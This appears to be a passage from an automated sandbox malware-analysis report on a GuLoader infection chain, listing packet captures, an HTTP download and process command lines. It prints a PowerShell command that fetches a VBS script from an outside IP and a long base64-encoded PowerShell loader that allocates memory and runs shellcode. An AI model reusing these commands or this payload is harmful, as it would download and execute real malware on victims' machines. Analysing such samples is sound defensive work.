                  May 10, 2022 18:44:40.438370943 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438388109 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438405991 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438491106 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.438560009 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461571932 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461605072 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461627007 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461647987 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461663008 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461669922 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461694002 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461694956 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461715937 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461739063 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461755991 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461783886 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485105038 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485157013 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485196114 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485225916 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485255957 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485277891 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485301018 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485315084 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485352993 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485379934 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485388041 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485425949 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485466003 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485476017 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485502958 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485505104 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485543013 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485579967 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485599041 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485619068 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485656977 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485662937 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485692978 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485753059 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.508861065 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.508918047 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.508955002 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.508996010 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509036064 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509044886 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509074926 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509076118 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509116888 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509141922 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509167910 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509208918 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509221077 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509251118 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509293079 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509305000 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509334087 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509376049 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509383917 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509413958 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509459019 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509460926 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509502888 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509541035 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509557962 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509598017 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509639025 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509644985 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509677887 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509716988 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509721041 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509758949 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509798050 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509807110 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509836912 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509876966 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509886026 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509915113 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509954929 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509958982 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509994984 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510036945 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510042906 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.510078907 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510118961 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510121107 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.510159969 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510200977 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533369064 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533415079 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533440113 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533466101 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533489943 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533514977 CEST804972846.4.198.55192.168.2.4

                  HTTP Request Dependency Graph

                  • 46.4.198.55

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44972846.4.198.5580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampkBytes transferredDirectionData
                  May 10, 2022 18:44:40.413928032 CEST218OUTGET /10P/Sursdepa.vbs HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                  Host: 46.4.198.55
                  Connection: Keep-Alive
                  May 10, 2022 18:44:40.438344955 CEST220INHTTP/1.1 200 OK
                  Date: Tue, 10 May 2022 16:44:39 GMT
                  Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                  Last-Modified: Tue, 10 May 2022 10:15:23 GMT
                  ETag: "39b46-5dea59a4f4c1a"
                  Accept-Ranges: bytes
                  Content-Length: 236358
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Data Raw: 27 65 6c 61 65 6f 63 61 72 20 46 72 65 64 6e 69 38 20 6b 69 6c 64 65 74 65 6b 73 20 53 45 4b 53 45 52 45 4e 20 74 72 6b 6e 69 6e 67 73 20 42 6c 6f 6d 73 74 65 72 67 61 20 44 72 75 6d 6d 65 72 73 35 20 52 61 6d 68 65 20 54 76 75 6e 67 65 6e 20 56 65 72 6d 69 63 6c 65 6e 6f 20 52 59 47 53 54 44 49 4e 44 49 20 4b 6f 6e 74 65 72 65 20 41 62 6f 72 74 65 64 65 20 4b 52 45 54 20 61 67 74 65 74 73 65 64 20 4d 69 64 74 76 65 38 20 53 75 70 72 61 63 20 49 6e 63 72 75 73 20 42 61 6c 6e 65 61 65 75 36 20 53 79 73 74 65 6d 72 65 6c 61 34 20 4e 41 54 49 4f 4e 45 52 20 64 65 6e 65 67 61 74 20 49 6e 74 65 72 70 6c 61 79 20 49 6e 74 65 72 67 65 6e 20 64 61 6e 64 79 69 73 6d 73 20 46 45 52 52 20 0d 0a 27 54 56 49 4c 4c 49 4e 20 4f 76 65 72 6d 37 20 4b 76 61 72 6b 73 73 75 62 73 36 20 55 4e 44 45 52 46 52 20 6e 69 65 6c 6c 65 20 54 61 62 61 63 69 6e 67 65 35 20 54 69 6d 65 76 69 73 74 73 61 34 20 41 50 53 49 20 43 68 72 69 73 72 6f 38 20 6c 61 70 70 69 73 68 63 64 67 20 75 6e 6d 61 74 63 68 61 62 20 66 72 73 74 65 66 64 73 65 6c 20 42 45 56 47 45 4c 53 45 20 72 65 6c 69 63 61 72 79 20 50 72 65 64 65 6e 69 61 37 20 41 6e 73 67 6e 69 6e 67 20 73 74 69 6b 73 61 20 53 6f 6c 66 20 42 4c 4f 4b 46 55 4e 4b 54 49 20 4b 61 74 61 72 61 6b 74 33 20 73 69 64 65 72 65 66 65 20 0d 0a 27 73 63 68 a4 75 62 6c 65 20 53 79 67 65 73 36 20 64 69 62 62 75 6b 73 69 6c 20 42 6c 6f 6d 73 20 48 4f 52 53 45 20 74 65 6c 65 6f 70 70 20 4f 6d 62 75 64 64 65 74 73 20 43 65 6e 74 72 35 20 42 6f 75 6c 65 76 61 72 64 74 20 42 69 70 69 6e 6e 61 74 38 20 41 46 42 4c 53 20 72 65 69 6e 64 75 63 65 20 6f 76 65 72 65 6c 61 62 20 4b 6f 67 65 67 35 20 63 61 6e 74 69 6f 6e 61 72 62 20 49 6d 6d 75 6e 64 69 63 33 20 61 62 62 65 64 20 4d 4f 4e 45 54 49 5a 20 62 72 61 6e 63 20 53 65 6d 69 6d 65 64 69 63 20 57 41 47 49 4e 47 52 20 0d 0a 27 50 61 6e 74 68 65 69 73 6d 31 20 45 66 74 65 72 62 38 20 43 72 69 74 69 63 20 54 61 6c 6c 73 65 75 6e 33 20 49 6e 66 6c 6f 77 73 32 20 64 69 73 73 65 20 54 65 67 6e 65 62 6c 6f 6b 33 20 47 6f 6f 64 68 65 61 72 20 52 61 61 6f 6c 69 65 72 6e 65 20 0d 0a 27 45 67 65 74 66 6f 72 62 20 74 6f 72 73 6b 20 6b 72 75 6d 61 20 53 6f 6e 69 6e 67 65 72 73 77 33 20 54 68 65 6f 34 20 46 52 45 4d 52 59 4b 4e 49 4e 20 49 6e 66 65 72 72 65 72 69 20 75 6e 70 72 65 64 20 49 4e 44 45 53 4e 45 45 4e 20 65 71 75 69 76 61 6c 20 4f 56 45 52 44 45 4c 49 43 20 69 6e 64 66 20 76 69 64 65 6f 6b 61 6d 65 72 20 45 6e 65 72 67 69 6d 6e 31 20 44 6f 67 66 20 4b 61 73 74 65 20 0d 0a 27 51 75 69 6c 74 73 6b 72 61 20 51 75 61 62 69 72 64 6f 70 20 55 64 72 61 61 37 20 73 76 61 72 62 72 65 76 65 20 48 69 63 6b 73 69 74 20 6f 63 68 65 72 73 65 70 69 73 20 55 6e 6c 61 62 69 61 6c 20 43 6c 69 71 20 56 65 6e 64 69 6e 67 65 31 20 4f 76 65 72 73 69 67 73 74 61 35 20 42 4f 4e 46 49 4c 20 53 75 6d 70 66 31 20 55 66 6f 72 34 20 47 72 61 76 65 6d 61 73 6b 69 20 48 79 70 65 72 70 65 72 66 65 31 20 63 61 74 65 67 6f 20 44 69 73 63 69 70 6c 32 20 46 41 4c 53 20 54 77 69 6e 6a 65 74 63 61 6c 32 20 45 4c 4f 52 47 4c 45 52 53 41 20 45 72 6f 74 69 6b 73 20 41 6c 70 68 20 53 65 6e 6e 69 67 68 74 75 6e 36 20 46 69 62 72 6f 61 20 53 6b 61 72 65 76 20 4e 4f 4e 45 52 52 4f 4e
                  Data Ascii: 'elaeocar Fredni8 kildeteks SEKSEREN trknings Blomsterga Drummers5 Ramhe Tvungen Vermicleno RYGSTDINDI Kontere Abortede KRET agtetsed Midtve8 Suprac Incrus Balneaeu6 Systemrela4 NATIONER denegat Interplay Intergen dandyisms FERR 'TVILLIN Overm7 Kvarkssubs6 UNDERFR nielle Tabacinge5 Timevistsa4 APSI Chrisro8 lappishcdg unmatchab frstefdsel BEVGELSE relicary Predenia7 Ansgning stiksa Solf BLOKFUNKTI Katarakt3 siderefe 'schuble Syges6 dibbuksil Bloms HORSE teleopp Ombuddets Centr5 Boulevardt Bipinnat8 AFBLS reinduce overelab Kogeg5 cantionarb Immundic3 abbed MONETIZ branc Semimedic WAGINGR 'Pantheism1 Efterb8 Critic Tallseun3 Inflows2 disse Tegneblok3 Goodhear Raaolierne 'Egetforb torsk kruma Soningersw3 Theo4 FREMRYKNIN Inferreri unpred INDESNEEN equival OVERDELIC indf videokamer Energimn1 Dogf Kaste 'Quiltskra Quabirdop Udraa7 svarbreve Hicksit ochersepis Unlabial Cliq Vendinge1 Oversigsta5 BONFIL Sumpf1 Ufor4 Gravemaski Hyperperfe1 catego Discipl2 FALS Twinjetcal2 ELORGLERSA Erotiks Alph Sennightun6 Fibroa Skarev NONERRON


                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:1
                  Start time:18:44:30
                  Start date:10/05/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1
                  Imagebase:0x7ff6ba650000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Target ID:2
                  Start time:18:44:30
                  Start date:10/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff647620000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:3
                  Start time:18:44:34
                  Start date:10/05/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
                  Imagebase:0x7ff6ba650000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Target ID:11
                  Start time:18:44:55
                  Start date:10/05/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
                  Imagebase:0x7ff6e4820000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:14
                  Start time:18:45:16
                  Start date:10/05/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAGUAbgBhAHQAZQByAGYAbwA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVABJAE8ATABPAEcAIgApAC4AQQBjAGUAdABhAG0AaQBkAHAAaAAyAA0ACgANAAoAJABVAHQAaQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABTAGUAbgBhAHQAZQByAGYAbwAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAG4AYQB0AGUAcgBmAG8ALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVQB0AGkAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAZQBuAGEAdABlAHIAZgBvAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAYwBvAG4AYwBvAG0AaQB0AGEAPQAwADsAIAAkAGMAbwBuAGMAbwBtAGkAdABhACAALQBsAHQAIAAkAFUAdABpAGwALgBjAG8AdQBuAHQAIAA7ACAAJABjAG8AbgBjAG8AbQBpAHQAYQArACsAKQANAAoAewANAAoACQANAAoAWwBIAGUAeABhAHMAdABpAGMAaAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMAKwAkAGMAbwBuAGMAbwBtAGkAdABhACwAWwByAGUAZgBdACQAVQB0AGkAbABbACQAYwBvAG4AYwBvAG0AaQB0AGEAXQAsADEAKQANAAoADQAKAH0ADQAKAFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMALAAgADAAKQANAAoADQAKAA0ACgA=
                  Imagebase:0xb70000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:15
                  Start time:18:45:16
                  Start date:10/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff647620000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:18
                  Start time:18:45:56
                  Start date:10/05/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
                  Imagebase:0x30000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  General

                  Target ID:19
                  Start time:18:45:59
                  Start date:10/05/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
                  Imagebase:0x1230000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  No disassembly